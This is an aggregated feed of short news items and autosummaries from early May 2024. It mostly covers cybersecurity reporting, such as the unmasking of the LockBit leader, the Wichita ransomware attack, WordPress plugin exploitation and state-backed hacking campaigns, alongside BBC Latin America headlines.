          $10 million reward offer for apprehension of unmasked LockBit ransomware leader

          exploits ransomware
          2024-05-09 https://www.exponential-e.com/blog/10-million-reward-offer-for-apprehension-of-unmasked-lockbit-ransomware-leader
Do you know Dmitry Yuryevich Khoroshev? If you do, there's a chance that you might well be on the way to receiving a reward of up to $10 million. Read more in my article on the Exponential-e blog. "

          Autosummary: "


          Panama Papers law firm founder Ramón Fonseca dies

          latam
          2024-05-09 https://www.bbc.co.uk/news/world-latin-america-68986408
          The 71-year-old died in hospital while awaiting a verdict in his money-laundering trial. "

          Autosummary: "


          How workforce reductions affect cybersecurity postures

          ciber
          2024-05-08 https://www.helpnetsecurity.com/2024/05/08/pentesting-cybersecurity-importance/

          In its State of Pentesting Report, Cobalt reveals an industry struggling to balance the use of AI and protecting against it, while facing significant resource and staffing constraints. Pentesting plays a key role in addressing this challenge, equipping organizations with the ability to security-test critical assets, expanded environments, and proliferating cloud applications more frequently. Cobalt analyzed 4,068 pentests, revealing a 21% increase in the number of findings per pentest engagement year-over-year, aligning with increases … More

          The post How workforce reductions affect cybersecurity postures appeared first on Help Net Security.

          "

          Autosummary: Cobalt analyzed 4,068 pentests, revealing a 21% increase in the number of findings per pentest engagement year-over-year, aligning with increases in Common Vulnerabilities and Exposures (CVE) records. "


          97% of organizations hit by ransomware turn to law enforcement

          exploits ransomware
          2024-05-08 https://www.helpnetsecurity.com/2024/05/08/ransomware-law-enforcement-help/

          Sophos has released additional findings from its annual “State of Ransomware 2024” survey. According to the report, among organizations surveyed, 97% of those hit by ransomware over the past year engaged with law enforcement and/or official government bodies for help with the attack. In addition, 59% of those organizations that did engage with law enforcement found the process easy or somewhat easy. Only 10% of those surveyed said the process was very difficult. Based on … More

          The post 97% of organizations hit by ransomware turn to law enforcement appeared first on Help Net Security.

          "

          Autosummary: “At the Bureau, we’ve been doubling down in particular on our work with the private sector, in their capacity as victims of cyberattacks, of course, because the mission of the FBI always has been—and always will be—victim-centric—but also as integral partners, who can share valuable information about threats and trends, and, increasingly, join in our operations themselves,“ said Christopher Wray, FBI director. "


          Cybersecurity jobs available right now: May 8, 2024

          ciber
          2024-05-08 https://www.helpnetsecurity.com/2024/05/08/cybersecurity-jobs-available-right-now-may-8-2024/

          CISO, Pinsent Masons | United Kingdom | Hybrid: As a CISO, you will be responsible for the overall security posture of the organisation, ensuring the organisation’s information and technology assets are protected from internal and external threats. Cloud Security Architect, Kyndryl | Israel | Hybrid: As a Cloud Security Architect, you will conduct risk assessments and threat modeling to identify and prioritize risks to the company’s business and … More

          The post Cybersecurity jobs available right now: May 8, 2024 appeared first on Help Net Security.

          "

          Autosummary: Identity & Access Management Lead, Invesco Asset Management | India | On-site: The Identity and Access Management Team Lead will be responsible for how we design, implement, and continually improve Identity Access Management, Privileged Access Management, Privileged Identity Management, and Identity Governance Administration used across external and internal facing applications, products, services and backend technologies. Cyber Security Engineer 4, Pacific Northwest National Laboratory | USA | On-site: As Cyber Security Engineer 4, you will design, deploy, and operate systems, networks, applications, and tools that support cybersecurity and cyber defense. Senior Full-Stack Engineer – Security, Mercury | USA | Remote: As a Security Engineer at Mercury, you will address key security features within the product, such as developing passkey support, enhancing the security dashboard, refining user-facing audit logs, and implementing SAML. "


          Hijack Loader Malware Employs Process Hollowing, UAC Bypass in Latest Version

          exploits
          2024-05-08 https://thehackernews.com/2024/05/hijack-loader-malware-employs-process.html
          A newer version of a malware loader called Hijack Loader has been observed incorporating an updated set of anti-analysis techniques to fly under the radar. "These enhancements aim to increase the malware's stealthiness, thereby remaining undetected for longer periods of time," Zscaler ThreatLabz researcher Muhammed Irfan V A said in a technical report. "Hijack "

          Autosummary: This includes Amadey, Lumma Stealer (aka LummaC2), Meta Stealer, Raccoon Stealer V2, Remcos RAT, and Rhadamanthys. "


          Hackers Exploiting LiteSpeed Cache Bug to Gain Full Control of WordPress Sites

          exploits
          2024-05-08 https://thehackernews.com/2024/05/hackers-exploiting-litespeed-cache-bug.html
          A high-severity flaw impacting the LiteSpeed Cache plugin for WordPress is being actively exploited by threat actors to create rogue admin accounts on susceptible websites. The findings come from WPScan, which said that the vulnerability (CVE-2023-40000, CVSS score: 8.3) has been leveraged to set up bogus admin users with the names wpsupp‑user  "

          Autosummary: LiteSpeed Cache has over 5 million active installations, with statistics showing that versions other than 5.7, 6.0, 6.1, and 6.2 are still active on 16.8% of all websites. "


          UK Ministry of Defense disclosed a third-party data breach exposing military personnel data

          financial
          2024-05-08 https://securityaffairs.com/162840/data-breach/uk-ministry-of-defense-third-party-data-breach.html
          The UK Ministry of Defense disclosed a data breach at a third-party payroll system that exposed data of armed forces personnel and veterans. The UK Ministry of Defense disclosed a data breach impacting a third-party payroll system that exposed data of approximately 272,000 armed forces personnel and veterans. The Ministry of Defence revealed that a […] "

          Autosummary: Pierluigi Paganini, May 08, 2024. The UK Ministry of Defense disclosed a data breach at a third-party payroll system that exposed data of armed forces personnel and veterans. "


          Desperate Taylor Swift fans defrauded by ticket scams

          financial
          2024-05-08 https://www.malwarebytes.com/blog/news/2024/05/desperate-taylor-swift-fans-defrauded-by-ticket-scams
          When there are not nearly enough tickets for some concerts to accommodate all the fans that desperately want to be there, it makes for ideal hunting grounds for scammers. "

          Autosummary: As reported by the BBC, Lloyds Bank estimates that fans have lost an estimated £1m ($1.25 m) in ticket scams ahead of the UK leg of Taylor Swift’s Eras tour. "


          LiteSpeed Cache WordPress plugin actively exploited in the wild

          exploits
          2024-05-08 https://securityaffairs.com/162876/hacking/litespeed-cache-wordpress-pluging-bug.html
          Threat actors are exploiting a high-severity vulnerability in the LiteSpeed Cache plugin for WordPress to take over websites. WPScan researchers reported that threat actors are exploiting a high-severity vulnerability in the LiteSpeed Cache plugin for WordPress. LiteSpeed Cache for WordPress (LSCWP) is an all-in-one site acceleration plugin, featuring an exclusive server-level cache and a collection […] "

          Autosummary: Pierluigi Paganini, May 08, 2024. Threat actors are exploiting a high-severity vulnerability in the LiteSpeed Cache plugin for WordPress to take over websites. "


          Brazil floods: "We've never experienced anything like it"

          latam
          2024-05-08 https://www.bbc.com/news/articles/cle07g0zzqeo
          Residents of the Brazilian city of Porto Alegre describe the devastation caused by recent floods. "

          Autosummary: "


          City of Wichita breach claimed by LockBit ransomware gang

          exploits government ransomware
          2024-05-08 https://www.bleepingcomputer.com/news/security/city-of-wichita-breach-claimed-by-lockbit-ransomware-gang/
          The LockBit ransomware gang has claimed responsibility for a disruptive cyberattack on the City of Wichita, which has forced the City's authorities to shut down IT systems used for online bill payment, including court fines, water bills, and public transportation. [...] "

          Autosummary: Public services, including golf courses, parks, courts, and the water district, require residents to pay in cash or by check while online payment platforms are shut down. "


          Ascension healthcare takes systems offline after cyberattack

          ciber
          2024-05-08 https://www.bleepingcomputer.com/news/security/ascension-healthcare-takes-systems-offline-after-cyberattack/
          Ascension, one of the largest private healthcare systems in the United States, has taken some of its systems offline to investigate what it describes as a "cyber security event." [...] "

          Autosummary: "On Wednesday, May 8, we detected unusual activity on select technology network systems, which we now believe is due to a cyber security event," Ascension said. "


          New BIG-IP Next Central Manager bugs allow device takeover

          exploits
          2024-05-08 https://www.bleepingcomputer.com/news/security/new-big-ip-next-central-manager-bugs-allow-device-takeover/
          F5 has fixed two high-severity BIG-IP Next Central Manager vulnerabilities, which can be exploited to gain admin control and create rogue accounts on any managed assets. [...] "

          Autosummary: In November, F5 warned customers that "skilled" attackers were exploiting two critical BIG-IP vulnerabilities (CVE-2023-46747 and CVE-2023-46748) fixed one month before to hack into unpatched devices, executing malicious code and erasing signs of the breach. "


          Smashing Security podcast #371: Unmasking LockBitsupp, company extortion, and a Tinder fraudster

          ransomware
          2024-05-08 https://grahamcluley.com/smashing-security-podcast-371/
          The kingpin of the LockBit ransomware is named and sanctioned, a cybersecurity consultant is charged with a $1.5 million extortion, and a romance fraudster defrauded women he met on Tinder of £80,000. All this and much, much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by “Ransomware Sommelier” Allan Liska. "

          Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Allan Liska – @uuallan Episode links: Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks. "


          LockBit gang claimed responsibility for the attack on City of Wichita

          government ransomware
          2024-05-08 https://securityaffairs.com/162910/cyber-crime/city-of-wichita-lockbit-ransomware.html
          The LockBit ransomware group has added the City of Wichita to its Tor leak site and threatened to publish stolen data. Last week, the City of Wichita, Kansas, was the victim of a ransomware attack and shut down its network to contain the threat. Wichita is the most populous city in the U.S. state of […] "

          Autosummary: Pierluigi Paganini, May 08, 2024. The LockBit ransomware group has added the City of Wichita to its Tor leak site and threatened to publish stolen data. "


          Ransomware activity is back on track despite law enforcement efforts

          exploits
          2024-05-07 https://www.helpnetsecurity.com/2024/05/07/ransomware-activity-q1-2024/

          Despite significant disruptions for high-profile ransomware gangs LockBit and BlackCat, Q1 2024 became the most active first quarter ever recorded — a 21% increase over Q1 2023, according to Corvus Insurance. In January, Corvus reported that global ransomware attacks in 2023 set a record high, surpassing 2022 by close to 70%. The Q1 Ransomware Report shows that 2024 is picking up right where 2023 left off. According to the data, 1,075 leak site ransomware victims … More

          The post Ransomware activity is back on track despite law enforcement efforts appeared first on Help Net Security.

          "

          Autosummary: According to the data, 1,075 leak site ransomware victims were posted on leak sites during the first quarter of 2024, despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22% and 8% of the activity, respectively. "


          Ransomware operations are becoming less profitable

          exploits
          2024-05-07 https://www.helpnetsecurity.com/2024/05/07/ransomware-payments-falling/

          As the number of real (and fake) victims of ransomware gangs continues to rise, the number of ransomware payments is falling, along with the average ransom payment. The reasons behind this decrease are many: increased cyber resilience of organizations (which includes having recoverable backups), the availability of decryptors created by law enforcement and cybersecurity companies, more frequent law enforcement actions, and so on. “Despite the surge in attacks in 2023, ransomware attacks involving payments decreased … More

          The post Ransomware operations are becoming less profitable appeared first on Help Net Security.

          "

          Autosummary: “Innovative disruption strategies involving a whole-of-government approach targeting every part of the cybercriminal ecosystem — from the infrastructure, to the laundering mechanisms, to arrests, sanctions, and asset seizures, along with the use of blockchain intelligence tools, are essential for understanding and counteracting the affiliates’ adaptation mechanisms.” "


          Sumo Logic’s analytics capabilities allow security teams to find insights within their data

          industry
          2024-05-07 https://www.helpnetsecurity.com/2024/05/07/sumo-logic-security-analytics-capabilities/

          Sumo Logic announced new AI and security analytics capabilities that allow security and development teams to align around a single source of truth and collect and act on data insights more quickly. These advancements, bolstered by Sumo Logic’s free data ingest licensing, empower customers to use their critical security data to close security gaps and better fuel DevSecOps. A recent Cloud Security Alliance survey found that only 30% of respondents believe they have good collaboration … More

          The post Sumo Logic’s analytics capabilities allow security teams to find insights within their data appeared first on Help Net Security.

          "

          Autosummary: “We’re excited to deliver new security innovations leveraging AI and deeper threat intelligence, all wrapped around our new Flex Licensing model – removing the economic and collaboration barriers by ingesting, storing and analyzing all security log events in the Sumo Logic SaaS Log Analytics Platform, so Dev, Sec and Ops teams have a single place to monitor and secure their apps and infrastructure,” added Kim. New capabilities include: New integrated threat intelligence: By integrating an out-of-the-box threat intelligence feed and third-party feeds with security log data, Sumo Logic is strengthening security postures and providing earlier threat detection. "


          Russian Operator of BTC-e Crypto Exchange Pleads Guilty to Money Laundering

          financial rusia-ucrania
          2024-05-07 https://thehackernews.com/2024/05/russian-operator-of-btc-e-crypto.html
          A Russian operator of a now-dismantled BTC-e cryptocurrency exchange has pleaded guilty to money laundering charges from 2011 to 2017. Alexander Vinnik, 44, was charged in January 2017 and taken into custody in Greece in July 2017. He was subsequently extradited to the U.S. in August 2022. Vinnik and his co-conspirators have been accused of owning and managing "

          Autosummary: "


          Alexander Vinnik, the operator of BTC-e exchange, pleaded guilty to money laundering

          financial
          2024-05-07 https://securityaffairs.com/162803/cyber-crime/alexander-vinnik-pleaded-guilty.html
          Alexander Vinnik, a Russian operator of the virtual currency exchange BTC-e, pleaded guilty to participating in a money laundering scheme. Alexander Vinnik, a Russian national, pleaded guilty to conspiracy to commit money laundering for his involvement in operating the cryptocurrency exchange BTC-e from 2011 to 2017. BTC-e processed over $9 billion in transactions and served over […] "

          Autosummary: Pierluigi Paganini, May 07, 2024. Alexander Vinnik, a Russian operator of the virtual currency exchange BTC-e, pleaded guilty to participating in a money laundering scheme. The virtual currency exchange received criminal proceeds from various illegal activities, including computer intrusions, ransomware attacks, identity theft, corruption, and drug distribution. "


          Brazil floods leave hundreds of towns under water

          latam
          2024-05-07 https://www.bbc.co.uk/news/world-latin-america-68968987
          At least 85 people have died in Rio Grande do Sul state and 150,000 have had to flee their homes. "

          Autosummary: "


          Surfer murders shock peaceful Mexico community

          latam
          2024-05-07 https://www.bbc.co.uk/news/world-us-canada-68967238
          A booming tourist and expat community is in shock after the campsite murder of three foreign surfers. "

          Autosummary: "


          Images show devastating impact of Brazil floods

          latam
          2024-05-07 https://www.bbc.co.uk/news/world-latin-america-68969337
          Aerial footage shows devastating scenes in Brazil as landslides and massive flooding kill dozens. "

          Autosummary: "


          LockBit ransomware admin identified, sanctioned in US, UK, Australia

          exploits ransomware
          2024-05-07 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-admin-identified-sanctioned-in-us-uk-australia/
          The FBI, UK National Crime Agency, and Europol have unveiled sweeping indictments and sanctions against the admin of the LockBit ransomware operation, with the identity of the Russian threat actor revealed for the first time. [...] "

          Autosummary: Between June 2022 and February 2024, law enforcement claims that the ransomware operation conducted over 7,000 attacks, with the top five countries hit being the US, the UK, France, Germany, and China. "


          LockBit leader unmasked: US charges Russian national

          ransomware rusia-ucrania
          2024-05-07 https://www.helpnetsecurity.com/2024/05/07/lockbit-lockbitsupp-unmasked/

          Russian national Dmitry Khoroshev is “LockBitSupp”, the creator, developer and administrator of the infamous LockBit ransomware group, according to UK, US and Australian law enforcement agencies. The US Justice Department has unsealed charges against Khoroshev, and the US Department of the Treasury’s Office of Foreign Assets Control (OFAC), the Australian Department of Foreign Affairs, and the UK Foreign, Commonwealth and Development Office have imposed sanctions on him. Taking LockBit down In February 2024, the UK … More

          The post LockBit leader unmasked: US charges Russian national appeared first on Help Net Security.

          "

          Autosummary: With the help of affiliates, the LockBit ransomware group attacked more than 2,500 victims – individuals, businesses, hospitals, critical infrastructure organizations, government agencies, etc. – in 120+ countries, and “extracted at least $500 million in ransom payments from their victims and caused billions of dollars in broader losses, such as lost revenue, incident response, and recovery.” "


          Russian Hacker Dmitry Khoroshev Unmasked as LockBit Ransomware Administrator

          exploits ransomware rusia-ucrania
          2024-05-07 https://thehackernews.com/2024/05/russian-hacker-dmitry-khoroshev.html
          The U.K. National Crime Agency (NCA) has unmasked the administrator and developer of the LockBit ransomware operation, revealing it to be a 31-year-old Russian national named Dmitry Yuryevich Khoroshev. In addition, Khoroshev has been sanctioned by the U.K. Foreign, Commonwealth and Development Office (FCDO), the U.S. Department of the Treasury’s Office of Foreign Assets Control ( "

          Autosummary: "LockBit ransomware has been used against Australian, UK and US businesses, comprising 18% of total reported Australian ransomware incidents in 2022-23 and 119 reported victims in Australia," Penny Wong, Minister for Foreign Affairs of Australia, said. "


          DocGo discloses cyberattack after hackers steal patient health data

          ciber
          2024-05-07 https://www.bleepingcomputer.com/news/security/docgo-discloses-cyberattack-after-hackers-steal-patient-health-data/
          Mobile medical care firm DocGo confirmed it suffered a cyberattack after threat actors breached its systems and stole patient health data. [...] "

          Autosummary: "


          Hackers exploit LiteSpeed Cache flaw to create WordPress admins

          exploits
          2024-05-07 https://www.bleepingcomputer.com/news/security/hackers-exploit-litespeed-cache-flaw-to-create-wordpress-admins/
          Hackers have been targeting WordPress sites with an outdated version of the LiteSpeed Cache plugin to create administrator users and gain control of the websites. [...] "

          Autosummary: Targeting Email Subscribers plugin: The ability to create admin accounts on WordPress sites gives attackers full control over the website, allowing them to modify content, install plugins, change critical settings, redirect traffic to unsafe sites, distribute malware, phishing, or steal available user data. "


          UK confirms Ministry of Defence payroll data exposed in data breach

          financial
          2024-05-07 https://www.bleepingcomputer.com/news/security/uk-confirms-ministry-of-defence-payroll-data-exposed-in-data-breach/
          The UK Government confirmed today that a threat actor recently breached the country's Ministry of Defence and gained access to part of the Armed Forces payment network. [...] "

          Autosummary: The UK defense secretary clarified that the hackers targeted an external system managed by a contractor that was “completely separate” from MoD’s core network, and had no connection to the “main military HR system.” "


          Law enforcement agencies identified LockBit ransomware admin and sanctioned him

          exploits ransomware
          2024-05-07 https://securityaffairs.com/162823/cyber-crime/lockbit-ransomware-admin-identified.html
          The FBI, UK National Crime Agency, and Europol revealed the identity of the admin of the LockBit operation and sanctioned him. The FBI, UK National Crime Agency, and Europol have unmasked the identity of the admin of the LockBit ransomware operation, aka ‘LockBitSupp’ and ‘putinkrab’, and issued sanctions against him. It was the first time that […] "

          Autosummary: Pierluigi Paganini, May 07, 2024. The FBI, UK National Crime Agency, and Europol revealed the identity of the admin of the LockBit operation and sanctioned him. The US government has also charged five other LockBit members in the past: Artur Sungatov, Ivan Kondratyev (Bassterlord), Ruslan Magomedovich Astamirov, Mikhail Matveev (Wazawaka), and Mikhail Vasiliev. "


          Parents pay tribute to surfers killed in Mexico

          latam
          2024-05-07 https://www.bbc.co.uk/news/world-australia-68974276
          "The world has become a darker place for us," say the Australian parents of brothers Callum and Jake. "

          Autosummary: "


          How to inspire the next generation of scientists | Unlocked 403: Cybersecurity podcast

          ciber
          2024-05-07 https://www.welivesecurity.com/en/we-live-science/how-inspire-scientists-unlocked-403-cybersecurity-podcast/
          As Starmus Earth draws near, we caught up with Dr. Garik Israelian to celebrate the fusion of science and creativity and venture where imagination flourishes and groundbreaking ideas take flight "

          Autosummary: "


          Surfers found dead in Mexico well were shot in head

          latam
          2024-05-06 https://www.bbc.com/news/articles/cd13vgg720jo
          Authorities believe three tourists were attacked as they were trying to fend off an attempted theft. "

          Autosummary: "


          Strategies for preventing AI misuse in cybersecurity

          ciber Linux
          2024-05-06 https://www.helpnetsecurity.com/2024/05/06/pukar-hamal-securitypal-ai-tools-in-cybersecurity/

          As organizations increasingly adopt AI, they face unique challenges in updating AI models to keep pace with evolving threats while ensuring seamless integration into existing cybersecurity frameworks. In this Help Net Security interview, Pukar Hamal, CEO at SecurityPal, discusses the integration of AI tools in cybersecurity. What are organizations’ main challenges when integrating AI into their cybersecurity infrastructures? Companies are like organisms: constantly changing every second. Given the dynamic nature of companies, keeping AI models … More

          The post Strategies for preventing AI misuse in cybersecurity appeared first on Help Net Security.

          "

          Autosummary: Employing a layered security approach, including encryption, behavior monitoring, and automatic alerts for unusual activities, helps strengthen defenses. In this Help Net Security interview, Pukar Hamal, CEO at SecurityPal, discusses the integration of AI tools in cybersecurity. "


          How to prepare for the CISSP exam: Tips from industry leaders

          industry
          2024-05-06 https://www.helpnetsecurity.com/2024/05/06/how-to-cissp-exam-prep/

          The Certified Information Systems Security Professional (CISSP) is the most widely recognized certification in the information security industry. CISSP certifies that an information security professional possesses extensive technical and managerial expertise for designing, engineering, and managing an organization’s security stance. In this article, CISSP-certified cybersecurity leaders provide practical tips and strategies to help candidates navigate the extensive study requirements and effectively manage their CISSP exam prep time. Whether you’re just starting your study journey or … More

          The post How to prepare for the CISSP exam: Tips from industry leaders appeared first on Help Net Security.

          "

          Autosummary: Even though I had over five years of experience in cybersecurity and over ten years in IT, my practical knowledge was only in specific domains (i.e. Security and Risk Management, Asset Security, Communications and Network Security, etc.). Looking back at the exam itself, I believe that having a strong knowledge foundation, coupled with real-life experience, and a network of colleagues you can always turn to and discuss certain topics you are less familiar with, is the key to success in passing the CISSP exam. Now, this may all sound easy, but the truth is that by the time I decided to pursue the CISSP, I already had 13 years of experience, numerous other industry certifications, and had been deeply involved in the cybersecurity field since the day I graduated; my Master’s thesis was also in cybersecurity. Ryan Williams Sr., IT Security Analyst, Buddobot: Here’s how I effectively studied for the CISSP certification, relying solely on comprehensive study materials rather than quick-fix dumps or quizlets. Shannon Brewster, Executive Director, General Manager, AT&T Cybersecurity: Passing the CISSP exam is an ambitious goal, especially if you hope to pass on your first attempt. Andrea Szeiler-Zengo, President of the Women4Cyber Hungarian Chapter: When I decided to get CISSP certified, I signed up for local training, but honestly, I learned more independently than in class. This structured approach to studying for the CISSP took approximately 6 months and, using a mix of reading, practical exercises, and motivational content, equipped me with the knowledge and confidence to successfully pass the exam. "


          Falklands still British, admits Argentina leader

          latam
          2024-05-06 https://www.bbc.com/news/articles/ce43zv3qln9o
          There is no "instant solution" to the claim over the islands, President Javier Milei tells the BBC. "

          Autosummary: "


          Finland authorities warn of Android malware campaign targeting bank users

          financial exploits
          2024-05-06 https://securityaffairs.com/162768/malware/finland-android-malware-campaign-banks.html
          Finland’s Transport and Communications Agency (Traficom) warned about an ongoing Android malware campaign targeting bank accounts. Traficom, Finland’s Transport and Communications Agency, issued a warning regarding a current Android malware campaign aimed at bank accounts. Traficom reported that clients of multiple banks received text messages in the Finnish language that instruct recipients to call a […] "

          Autosummary: Pierluigi Paganini, May 06, 2024. Finland’s Transport and Communications Agency (Traficom) warned about an ongoing Android malware campaign targeting bank accounts. Once installed, the malware grants access to the victim’s applications and messages, including online banking, allowing crooks to steal funds from the victim’s online bank. "


          Convicted candidate's stand-in wins Panama presidency

          latam
          2024-05-06 https://www.bbc.co.uk/news/world-latin-america-68963959
          José Raúl Mulino stood in for ex-President Ricardo Martinelli, who was barred from running. "

          Autosummary: "


          Surfers pay tribute to tourists found dead in Mexico

          latam
          2024-05-06 https://www.bbc.co.uk/news/world-68964757
          Authorities believe three tourists were attacked trying to fend off an attempted theft. "

          Autosummary: "


          City of Wichita shuts down IT network after ransomware attack

          exploits government ransomware
          2024-05-06 https://www.bleepingcomputer.com/news/security/city-of-wichita-shuts-down-it-network-after-ransomware-attack/
          The City of Wichita, Kansas, disclosed it was forced to shut down portions of its network after suffering a weekend ransomware attack. [...] "

          Autosummary: "


          Get ahead in cybersecurity with $145 off a training course bundle

          ciber
          2024-05-06 https://www.bleepingcomputer.com/news/security/get-ahead-in-cybersecurity-with-145-off-a-training-course-bundle/
          Cybersecurity is everyone's concern, and for IT workers, a key skill on their resume. This five-course exam prep bundle helps you get more advanced credentials for $49.99, $145 off the $195 MSRP. [...]

          Autosummary: And the Certified Information Systems Security Professional (CISSP) course looks at what it takes to design, launch, and maintain advanced cybersecurity initiatives.


          Lockbit's seized site comes alive to tease new police announcements

          ransomware
          2024-05-06 https://www.bleepingcomputer.com/news/security/lockbits-seized-site-comes-alive-to-tease-new-police-announcements/
          The NCA, FBI, and Europol have revived a seized LockBit ransomware data leak site to hint at new information being revealed by law enforcement this Tuesday. [...]

          Autosummary: (Image: Revived LockBit dark web data leak site. Source: BleepingComputer.) These blog posts tease titles like "What have we learnt?," "More LB hackers exposed," "What have we been doing?," and what many hope to be the coup de grâce on the diminished ransomware operation, another blog post titled "Who is LockBitSupp?".


          China-Linked Hackers Suspected in ArcaneDoor Cyberattacks Targeting Network Devices

          ciber
          2024-05-06 https://thehackernews.com/2024/05/china-linked-hackers-suspected-in.html
          The recently uncovered cyber espionage campaign targeting perimeter network devices from several vendors, including Cisco, may have been the work of China-linked actors, according to new findings from attack surface management firm Censys. Dubbed ArcaneDoor, the activity is said to have commenced around July 2023, with the first confirmed attack against an unnamed victim

          Autosummary: A majority of the infections have been detected in Nigeria, India, China, Iran, Indonesia, the U.K., Iraq, the U.S., Pakistan, and Ethiopia.


          It Costs How Much?!? The Financial Pitfalls of Cyberattacks on SMBs

          financial ciber
          2024-05-06 https://thehackernews.com/2024/05/it-costs-how-much-financial-pitfalls-of.html
          Cybercriminals are vipers. They’re like snakes in the grass, hiding behind their keyboards, waiting to strike. And if you're a small- and medium-sized business (SMB), your organization is the ideal lair for these serpents to slither into. With cybercriminals becoming more sophisticated, SMBs like you must do more to protect themselves. But at what price? That’s the daunting question

          Autosummary: EDR solutions can detect, investigate, and mitigate potential threats across individual endpoints, such as computers, laptops, and mobile devices. Unfortunately, many SMBs end up learning one lesson the hard way: cyberattack recovery costs can be significantly higher than the initial investment required for an effective cybersecurity solution. Many SMBs aren't prepared for the inevitable: in our report, The State of Cybersecurity for Mid-Sized Businesses in 2023, we discovered that nearly 25% of SMBs have either suffered a cyberattack or didn't even realize they had suffered one in the past 12 months. There's more at stake than just money: today, it's commonplace to find budgets being slashed, leaving cybersecurity staff overextended, overworked, or nonexistent.


          City of Wichita hit by a ransomware attack

          exploits government ransomware
          2024-05-06 https://securityaffairs.com/162799/security/city-of-wichita-ransomware.html
          The City of Wichita in Kansas was forced to shut down its computer systems after a ransomware attack. The City of Wichita, Kansas, was the victim of a ransomware attack and shut down its network to contain the threat. The security breach took place on May 5th, 2024, and the city immediately started its incident response procedure […]

          Autosummary: City of Wichita hit by a ransomware attack (Pierluigi Paganini, May 06, 2024). The City of Wichita in Kansas was forced to shut down its computer systems after a ransomware attack.


          Argentina's Milei defends radical austerity plan

          latam
          2024-05-06 https://www.bbc.co.uk/news/world-latin-america-68935255
          The Argentine leader tells the BBC that the "political caste" is bearing the brunt of his reforms.


          Mexico surfer killings: Who were the victims?

          latam
          2024-05-06 https://www.bbc.co.uk/news/world-us-canada-68965803
          Friends and family of two Australian brothers and a US friend killed in Mexico have been paying tribute.


          Panama to choose president after front-runner sentenced

          latam
          2024-05-05 https://www.bbc.co.uk/news/world-latin-america-68935251
          The man who led the polls, ex-President Ricardo Martinelli, was found guilty of money-laundering.


          Madonna's free Brazil show draws 1.5 million fans

          latam
          2024-05-05 https://www.bbc.co.uk/news/entertainment-arts-68961409
          The show at Rio de Janeiro's Copacabana beach was the final stop on the pop idol's Celebration Tour.


          Finland warns of Android malware attacks breaching bank accounts

          financial exploits
          2024-05-05 https://www.bleepingcomputer.com/news/security/finland-warns-of-android-malware-attacks-breaching-bank-accounts/
          Finland's Transport and Communications Agency (Traficom) has issued a warning about an ongoing Android malware campaign targeting banking accounts. [...]

          Autosummary: (Image: Attack overview. Source: Traficom.) Vultur trojan suspected: although the authorities in Finland haven't determined the type of malware and have not shared any hashes or IDs for the APK files, the attacks resemble those Fox-IT analysts recently reported in connection to a new version of the Vultur trojan.


          Ransomware drama: Law enforcement seized Lockbit group’s website again

          exploits ransomware
          2024-05-05 https://securityaffairs.com/162778/cyber-crime/law-enforcement-seized-lockbit-site-again.html
          Law enforcement seized the Lockbit group’s Tor website again and announced they will reveal more identities of its operators. Law enforcement seized the Lockbit group’s Tor website again. The authorities resumed the Lockbit seized leak site and mocked its administrators. According to the countdown active on the seized, law enforcement that are currently controlling the […]

          Autosummary: Ransomware drama: Law enforcement seized Lockbit group’s website again (Pierluigi Paganini, May 05, 2024). Law enforcement seized the Lockbit group’s Tor website again and announced they will reveal more identities of its operators. Lockbit also said, and quote: "I don't understand why they're…" — vx-underground (@vxunderground), May 5, 2024. In February, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.


          Microsoft Outlook Flaw Exploited by Russia's APT28 to Hack Czech, German Entities

          exploits
          2024-05-04 https://thehackernews.com/2024/05/microsoft-outlook-flaw-exploited-by.html
          Czechia and Germany on Friday revealed that they were the target of a long-term cyber espionage campaign conducted by the Russia-linked nation-state actor known as APT28, drawing condemnation from the European Union (E.U.), the North Atlantic Treaty Organization (NATO), the U.K., and the U.S. The Czech Republic's Ministry of Foreign Affairs (MFA), in a statement, said some unnamed

          Autosummary: Russian state-sponsored cyber threat activity – data theft, destructive attacks, DDoS campaigns, and influence operations – is also expected to pose a severe risk to elections in regions like the U.S., the U.K., and the E.U. from multiple groups such as APT44 (aka Sandworm), COLDRIVER, KillNet, APT29, and APT28, per an assessment released by Google Cloud subsidiary Mandiant last week.


          Landslides and massive flooding kill 60 in Brazil

          latam
          2024-05-04 https://www.bbc.com/news/articles/c0w03627kq4o
          Officials say another 67 people are missing in Rio Grande do Sul, with more rain forecast.


          Iranian hackers pose as journalists to push backdoor malware

          exploits
          2024-05-04 https://www.bleepingcomputer.com/news/security/iranian-hackers-pose-as-journalists-to-push-backdoor-malware/
          The Iranian state-backed threat actor tracked as APT42 is employing social engineering attacks, including posing as journalists, to breach corporate networks and cloud environments of Western and Middle Eastern targets. [...]

          Autosummary: (Image: One of the fake personas created by APT42. Source: Google.) The media organizations impersonated by APT42 include the Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej Times (UAE), Azadliq (Azerbaijan), with Mandiant stating that the attacks often use typosquatted domains like "washinqtonpost[.]press".


          Mexico authorities find three bodies in search for tourists

          latam
          2024-05-04 https://www.bbc.com/news/articles/c4n1243x755o
          Bodies are found in the search for two missing Australian brothers and an American.


          Spain-Argentina row over drug-use accusation

          latam
          2024-05-04 https://www.bbc.com/news/articles/czd8qzvpl4lo
          A row breaks out after Spain's transport minister suggests Argentina's president has taken drugs.


          Cubans lured to Russian army by high pay and passports

          rusia-ucrania
          2024-05-04 https://www.bbc.co.uk/news/world-europe-68949298
          The number of Cubans recruited to fight in Ukraine is thought to be in the hundreds.


          From likes to votes: How influencers are changing Indian politics

          industry
          2024-05-04 https://www.bbc.co.uk/news/world-asia-india-68920953
          Politicians are roping in influencers to woo voters like never before. But is this a good thing?


          Most companies changed their cybersecurity strategy in the past year

          ciber
          2024-05-03 https://www.helpnetsecurity.com/2024/05/03/cybersecurity-business-strategy-perception/

          Businesses worldwide have faced a rate of change in the threat environment evidenced by 95% of companies reporting cybersecurity strategy adjustments within just the past year, according to LogRhythm. Strategic shifts within organizations: at the heart of these strategic shifts is the central role of leadership within organizations. The perception of cybersecurity has changed from a purely technical issue to a central pillar of business strategy and corporate governance, with 78% stating that the cybersecurity … More

